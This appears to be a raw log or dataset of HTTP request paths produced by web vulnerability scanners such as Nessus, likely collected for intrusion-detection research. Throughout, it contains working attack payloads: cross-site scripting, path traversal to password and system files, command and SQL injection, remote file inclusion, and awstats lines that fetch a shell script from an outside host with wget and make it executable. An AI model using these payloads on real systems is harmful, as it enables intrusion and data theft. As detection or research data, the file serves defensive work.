src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&del q85227619&rem \n/vmi8bb12.jspa?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/g3w7y7u5.cgi?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/en-us/33y9gcqq.html?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/top.php?stuff=&ping;-w;11000;-n;1;4.3.2.1&rem;\n/manager/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/examples/jsp/checkbox/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/y8pmygrp.jspa?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testkogj=3979;\"</script>\n/cgi.cgi/gwweb.exe?help=bad-request\n/library/classes/prescription.class.php\nshopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>\n/fmnveedu.x?<script>document.cookie=\"testgfbr=7014;\"</script>\n/de'buger/\n/\"they told you so\"/\n/if69ddo1.html?<script>document.cookie=\"testiabz=5220;\"</script>\n/cacti/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/exchange/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/servlets/servlet/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/kb.asp?a=\"><script>alert('wvs-xss-magic-string-411505577474')</script>\n/ddoworrl.htm?<script>document.cookie=\"testvlau=8517;\"</script>\n/gy23xnjq.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/rank-'em/\n/jujgxwav.nsf?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/cgi-bin/ovlaunch.exe\n/psuser/pscoerrpage.htm?errpagepath=/etc/passwd\n/scripts/1hactwocbsuo.asp\n/scripts/n4p4f4gtbhia.shtml\n/6dlc2zm9.x?<script>document.cookie=\"testqpux=4016;\"</script>\n/0z575z74.pl?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/zoywsxjghe.sh+>+/dev/null+&'); function v\n/weq93ppb.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.jsp?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/fcgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/cgi-bin/mkilog.exe\n/fpnpp5zg.exe?<script>document.cookie=\"testyias=101;\"</script>\n/phpmyadmin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/..\\/..\\/..\\/boot.ini\n/esmozg5d.kspx?<script>cross_site_scripting.nasl</script>\n/weq93ppb.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/webcart/webcart.cgi?config=mountain&change=yes&nextpage=;cat /etc/passwd|&code=phold\n/apavxugx.exe?<script>document.cookie=\"testdnbh=5237;\"</script>\n/b5xdqgz2.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='\\x0auname\\x09>q89799943\\x09#\n/o1zj4u9v.cgi?<script>document.cookie=\"testabrn=6368;\"</script>\n/subscriptions.html\n/mpcgi/.passwd\n/8x6w469u.x?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/7o5qp766.fts?<script>cross_site_scripting.nasl</script>\n/um7xpn15.idc?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/1995_silvia saint's leg sex friends/\n/scripts/errors/needinit.php?gallery_basedir=http://xxxxxxxx/\n/scripts/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/editprojectissue.do?projectissueid=\"><script>alert(414096083540)</script><\"\n/examples/servlets/servlet/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/quagynka.cfm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331908741,4--&blog=1\n/editor's_letter/\n/login/?user=|\"`id`\"|\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/webdav/phprun.php?cmd=c:\\service32.exe\n/scripts/irbf6nj7oyfh.pl\n/manager/al_initialize.php?alpath=/etc/passwd\\x00\n/examples/servlets/servlet/whois.cgi?action=load&whois=;id\n/javascript/document.xsl\n/main.php?stuff=\"|ping -w 7000 -n 1 1.2.3.4|rem \n/javascript/htpasswd.tar.gz\n/examples/jsp/num/index.php?p='nessus\n/rbec2ohx.htm?<script>cross_site_scripting.nasl</script>\n/javascript/document.swf\n/top.php?stuff='&rm q61677415 #\n/o6ebbirj.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/82q7ywa8.nsf?<script>document.cookie=\"testpwew=1315;\"</script>\n/include/default_header.php?script_path=http://192.168.202.118:8080/2aibfaczmac8?\n/msadc/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/iajtej82.htm?<script>cross_site_scripting.nasl</script>\n/dslpwt15.dll?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/javascript/_src.exe\n/cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>\n/uvazfs7p.exe?<script>document.cookie=\"testwtbo=4831;\"</script>\n/odzk29aa.jspa?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/manager/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/mv8wxfy9.do?<script>document.cookie=\"testrhbc=8184;\"</script>\n/javascript/mini.exe\n/uvazfs7p.html?<script>document.cookie=\"testwtbo=4831;\"</script>\n/phpmyadmin///../../../../../../../..windows/win.ini\n/hipkz026.cfc?<script>document.cookie=\"testyrbs=2855;\"</script>\n/phpmyadmin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/www/delivery/ac.php?bannerid=-1331918977+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dv8rullj]));die;/*\n/awstats/awstats.pl?migrate=|echo;/./tmp/wgwvwkorhp.sh;echo|awstats540737.txt\n/cgibin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/javascript/module.exe\n/1r8cfrlf.jspa?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/flash mx 2004 actionscript bible/\n/javascript/htpasswd.cfm\n/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd\n/fpnpp5zg.php3?<meta http-equiv=set-cookie content=\"testyias=101\">\n/examples/jsp/error/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/manager/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/cgibin/vssetcookie.exe\n/scripts/polls.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?\n/en-us/s7qus4g3.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/examples/jsp/jsp2/jspx/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd\n/main.php?logout=\"&rm q77567986 #\n/eventstranscripts/\n/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('vulnerable')</script>&lt;/script&gt;\n/scripts/gw5/gwweb.exe?htmlver=aaa&get-context\n/javascript/doubleclick.exe\n/manager/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/recordings/newsscript.pl?mode=admin\n/examples/servlets/servlet/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/7u1pb2xi.jsp?<script>document.cookie=\"testlwwz=718;\"</script>\n/admin/news.admin.php?path_to_script=http://192.168.202.96:8080/frznctvhi0i5??&cmd=ls\n/javascript/gwt.exe\n/javascript/oracle.xml.xsql.xsqlservlet.exe\n/help.php?q=\"ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/en-us/esmozg5d.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping,-w,11000,-n,1,4.3.2.1&rem,\n/modules/mydownloads/ratefile.php?lid=1\"><script>alert('wvs-xss-magic-string-413185588081');</script><br name=\"nothing\n/recordings/supporter/tupdate.php?groupid=change&sg='\n/phpmyadmin/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/verpag.php?pagid=999' and_force_mysql_error/*\n/examples/jsp/sessions/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/ldlchhikup0;echo|awstats244464.txt\n/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.118:8080/tzhfyzkbomspvm?'\n/manager/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/lmw4r201.php3?<script>document.cookie=\"testwews=8477;\"</script>\n/static//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd\n/scripts/login.cgi\n/scripts/include/error/forumerror.cfm?errorno=3\n/top.php?stuff=\"&sleep\\x0911\\x09#\n/8t9v8k7x.mscgi?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/g8nu2yy7.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0duname #\n/top.php?stuff=\"del,q89398857&rem,\n/weq93ppb.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"rm\\xa0q42369787&rem\\xa0\n/javascript/readme.exe\n/b1q8bywu.html?<script>cross_site_scripting.nasl</script>\n/main.php?logout=|ping;-w;11000;-n;1;4.3.2.1|rem;\n/ke-description/\n/main.php?stuff=\"\\x0ddel q12524199 #\n/examples/jsp/error/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 99859533--\n/top.php?stuff=\"\\x0auname >q15138829 #\n/top.php?stuff=&ver\\x09>q15482881&rem\\x09\n/606wkcop.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/jdx255ea.php?<script>document.cookie=\"testziyq=5055;\"</script>\n/qczkquis.php?<script>document.cookie=\"testkwlg=5591;\"</script>\n/top.php?stuff=\"&ping -w 7000 -n 1 1.2.3.4&rem \n/examples/jsp/jsp2/el/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/newsubscription/\n/a0imiuf1.htm?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/teagan's juice/\n/j734qobz.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/nffhikq061nq.shtml\n/jdx255ea.mscgi?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/cacti/index.php?site=../../../../../../../../etc/passwd\\x00\n/cacti/whois.cgi?action=load&whois=;id\n/main.php?stuff=\"&ping -w 8000 -n 1 4.3.2.1&rem \n/en-us/dda2qr7j.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zqqemp6j.jsp?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/fxm.exe\n/javascript/community.exe\n/admin/departments.php?projectissueid=\"><script>alert(412605577805)</script><\"\n/article.cfm?id=1'<script>alert(document.cookie);</script>\n/9ko6m4c8.cgi?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/6n7aacgg.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/modules.php?name=surveys&pollid=<script>alert('vulnerable')</script>\n/examples/jsp/colors/ovlaunch.exe\n/cgi-bin/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/map of tim's moves/\n/scripts/gtcatalog/password.inc\n/examples/jsp/num/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/examples/jsp/cal/shopexd.asp?catalogid='42\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- \n/starnet/addons/slideshow_full.php?album_name='1125155541\n/examples/jsp/jsp2/el/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/examples/jsp/sessions/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/javascript/parse.exe\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/javascript/cache.exe\n<script>document.cookie=\"testsqmm=5713;\"</script>\n/scripts/nph-exploitscanget.cgi?host=`id`&port=443&errchk=0&idsbypass=0\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/error/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/main.php?stuff='uname\\x09>q23771746\\x09#\n/javascript/complaints.exe\n/vmi8bb12.x?<script>document.cookie=\"testlerc=2575;\"</script>\n/cacti/faq.php?action=&type=view&s=&id=-1' union select 0,1200572060,0,0,0,0,0--\n/5o9zq43e.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testdnbh=5237;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\\x00\n/help.php?q=\";sleep 8 #\n/scripts/go.cgi|id|\n/javascript/dvd.exe\n/zqqemp6j.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5b+0c+83+c3+0c+89+da+8b+5b+04+39+d3+75+01+cc+8b+73+30+89+ef+6a+0d+59+66+ad++>>esbq\n/examples/jsp/sessions/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/help.php?q=\"&ver\\x09>q66498964&rem\\x09\n/javascript/int.exe\n/h5sc3gxy.exe?<script>cross_site_scripting.nasl</script>\n/cgi-perl/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1\n/main.php?stuff='\\x0ddel\\x09q87288375\\x09#\n/cgi-bin/search.jsp?q=%\"<script>alert(1331905049)</script>\n/counter_script/\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=bhclbg8njf27mdlhg\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/examples/jsp/sessions/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/protection.php?action=logout&siteurl=/etc/passwd\n/5o9zq43e.cfc?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|ping;-w;11000;-n;1;4.3.2.1|rem;\n/h4bi26jd.kspx?<script>document.cookie=\"testhrzx=1150;\"</script>\n/?<script>document.cookie=\"testfosd=94;\"</script>\n/zroo33l4.mscgi?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/top.php?stuff=\"rm\\x0bq81585151&rem\\x0b\n/h5i6crm3.htm?<script>document.cookie=\"testlihk=7070;\"</script>\n/en-us/jnv890lt.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini\n/admin/index.php?path_to_script=http://192.168.202.96:8080/swgnhpydbq0t??&cmd=ls\n/my_subscriptions/\n/miz4r5hz.cgi?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/checkbox/edit.jsp?page=user&editor=../../../install\n/help.php?q='del q41634876 #\n/examples/jsp/error/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/javascript/incubator.exe\n/scripts/crossdomain.xml\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/cf5_connector.cfm?command=fileupload&type=file&currentfolder=/\n/lmw4r201.jsp?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/javascript/2006.exe\n/examples/jsp/jsp2/el/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/3j8echh0.cfm?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scriptswf_information/\n/en-us/account/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/fa8p8lr8.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/rule.exe\n/j734qobz.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/en-us/account/sendtemp.pl?templ=../../../../../etc/passwd\n/killen'/\n/scs86g1p.htm?<script>document.cookie=\"testquyx=2820;\"</script>\n/top.php?stuff=\"ver;>q52915956&rem;\n/help.php?q=\"\\x0auname >q51358327 #\n/examples/jsp/error/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/byrg33fw.cfm?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/phpmyadmin//%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd\n/eei78ore.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/certsrv/..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/examples/jsp/checkbox/index.php?site=../../../../../../../../etc/passwd\\x00\n/byrg33fw.htm?<script>document.cookie=\"testexuu=5340;\"</script>\n/oie504mr.asp?<script>document.cookie=\"testtpby=7052;\"</script>\n/help.php?q=ver\\x0b>q14773727&rem\\x0b\n/scripts/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/bxnyrhmh.do?<script>document.cookie=\"testmjct=1867;\"</script>\n/main.php?logout=|ping;-w;9000;-n;1;4.3.2.1|rem;\n/cacti/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/javascript/tech.exe\n/javascript/efforts.exe\n/ddoworrl.exe?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/zv8tv7h8.cfc?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/scripts/t769qwej0llr.shtml\n/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt; \n/cacti/index.php?string='\n/updatesubscriptions/\n/examples/jsp/checkbox/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/main.php?logout=\"uname >q68212743 #\n/3j8echh0.jsp?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/manager/popup.php?include_path=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+del+ctdn\n/main.php?logout=;rm\\x09q38215685\\x09#\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/llumt7msyau5y?\n/script/ident/identification.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/servlets/servlet/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/scripts/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/scripts/awstats.pl\n/scripts/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/phpmyadmin/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/169okeyj.asp?<script>document.cookie=\"testxeoi=3573;\"</script>\n/scripts/view/twiki/webhome\n/ju0u7kfo.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/catalog.php?action=category_show&id='\n/javascript/developer.exe\n/nmw0do67.php?<script>cross_site_scripting.nasl</script>\n/index.php?site=../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/add_url.htm?node=<script>alert('xss')</script>\n/webtools/bonsai/showcheckins.cgi?person=<script>alert('vulnerable')</script>\n/webcgi/windmail.exe\n/ghswfouu.php3?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/d44uk9h2.fts?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/miz4r5hz.jspa?<script>document.cookie=\"testviqu=1270;\"</script>\n/javascript/document.xml\n/?<script>document.cookie=\"testexuu=5340;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q16581979\nftp://192.168.25.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/ptsrmtfadl.sh;echo|awstats270984.txt\n/scripts/lrn28issfuqi.sh\n/javascript/theme.exe\n/cgi-915/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/en-us/manager/search/data/inputs/script/_new\n/en-us/i686v90l.fts?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/lmw4r201.x?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/cms/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/scriptv0117973_3/\n/search.jsp?q=%\"<script>alert(1331904373)</script>\n/javascript/search.exe\n/javascript/registered.exe\n/0qhcnefz.htm?<script>cross_site_scripting.nasl</script>\n/nyvbv05h.jspa?<script>document.cookie=\"testftxz=5980;\"</script>\n/javascript/.passwd.cs\n/help.php?q=\"\\x0auname >q61288617 #\n/o1zj4u9v.jspa?<script>document.cookie=\"testabrn=6368;\"</script>\n/scripts/buoalakxhatu.asp\n/main.php?stuff=\\x0duname\\x09>q32478423\\x09#\n/advancedxss/\n/javascript/es.exe\n/copying/q33749448&q3338\"q3338<q3338>q33749448\n/examples/jsp/num/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908740,4,5\n/static//\\..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd\n/uvazfs7p.pl?<script>document.cookie=\"testwtbo=4831;\"</script>\n/javascript/document.csproj\n/en-us/w4996nr0.idc?<script>document.cookie=\"testttvs=7163;\"</script>\n/edzaia0i.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/i686v90l.cfc?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/top.php?stuff=&ping;-w;10000;-n;1;1.2.3.4&rem;\n/help.php?q=&uname\\x09>q27714341\\x09#\n/cgi.cgi/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/vac1l5vm.cfm?<script>cross_site_scripting.nasl</script>\n/ddoworrl.jspa?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/javascript/document.dll\n<script>document.cookie=\"testyias=101;\"</script>\n/main.php?stuff=ver\\x0c>q17742625&rem\\x0c\n/hrttz9fj.cgi?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/cgi-bin/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/examples/jsp/colors/al_initialize.php?alpath=/etc/passwd\\x00\n/\"james kim\"/\n/tukodz3j.idc?<script>cross_site_scripting.nasl</script>\n/scripts/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/htbin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/examples/jsp/cal/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/javascript/chat.exe\n/examples/jsp/jsp2/el/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/examples/jsp/jsp2/el/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/fcgi-bin/.htpasswd\n/machine_d'anticyth\\xc3\\xa8re/\n/0w155a7c.php3?<script>cross_site_scripting.nasl</script>\n/en-us/fo564rei.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j2kdmfw4.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='rm\\x09q68811991\\x09#\n/pls/simpledad/admin_/adddad.htm?<advanceddad>\n/scripts/superguestconfig\n/uc3w3bdi.nsf?<script>document.cookie=\"testxllt=9940;\"</script>\n//q99252119&#38;q8892&#34;q8892&#60;q8892&#62;q99252119\n/scripts/rss.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/instant-xss/\n/examples/jsp/colors/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/news/scripts/news_page.php?script_path=http://192.168.202.96:8080/4dckqcc0acprbz??\n/javascript/ows.exe\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggfh7vlzdb7fbriizix4smdaaa/qkzpkuflrb.sh;echo|awstats129892.txt\n/examples/jsp/num/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/hrttz9fj.jspa?<script>document.cookie=\"testtbjy=7334;\"</script>\n/main.php?logout=&uname\\x09>q53473158\\x09#\n/static//..\\..\\..\\..\\..\\..\\..\\..\\windows/win.ini\n/comment-script/\n/javascript/document.core\n/phpmyadmin/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/examples/jsp/cal/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/eg2u8pbv.aspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=&ping;-w;8000;-n;1;4.3.2.1&rem;\n/h5sc3gxy.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=;uname >q47158875 #\n/include/default_header.php?script_path=@rfiurl\n/javascript/irc.exe\n/prospect microsoft's money/\n/examples/jsp/jsp2/jspx/secure.php?cfgprogdir=/etc/passwd\\x00\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.do\n/javascript/enc.exe\n/jnt3f86c.cfc?<script>document.cookie=\"testcmax=9270;\"</script>\n/hrttz9fj.asp?<script>document.cookie=\"testtbjy=7334;\"</script>\n/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/v3axg1p8.kspx?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/main.php?stuff=&del;q26155749&rem;\n/scripts/a1disp3.cgi?/../../../../../../etc/passwd\n/javascript/00.exe\n/fpnpp5zg.aspx?<meta http-equiv=set-cookie content=\"testyias=101\">\n/help.php?q='\\x0asleep\\x097\\x09#\n/fcgi-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/quagynka.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping -w 11000 -n 1 4.3.2.1&rem \n/javascript/url.exe\n/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/main.php?logout=\";sleep 8 #\n/top.php?stuff='|sleep 8 #\n/cgi-bin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/webchat/register.php?register=yes&username=overg&email=<script>alert (\\\"vulnerable\\\")</script>&email1=<script>alert (\\\"vulnerable\\\")</script>\n/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1\n/cacti/newsdesk.cgi?t=../../../../../../etc/passwd\n/main.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/iajtej82.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?edit=nonexistant82887053\n/en-us/fo564rei.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/faq.php?action=&type=view&s=&id=-1' union select 0,708862898,0,0,0,0,0--\n/cacti/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/xlj7h65o.cfc?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/main.php?logout=uname >q22655649 #\n/prest_inscript1/\n/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008637')</script>\n/3m5knyc4.aspx?<script>document.cookie=\"testbgqj=6434;\"</script>\n//</p><body><script src=http://www.example.com/test?rnd=q94793674></script><p>\n/lang/lang.php?lang_path=/etc/passwd\\x00\n/scripts/nffhikq061nq.sh\n/hrttz9fj.jspa?<meta http-equiv=set-cookie 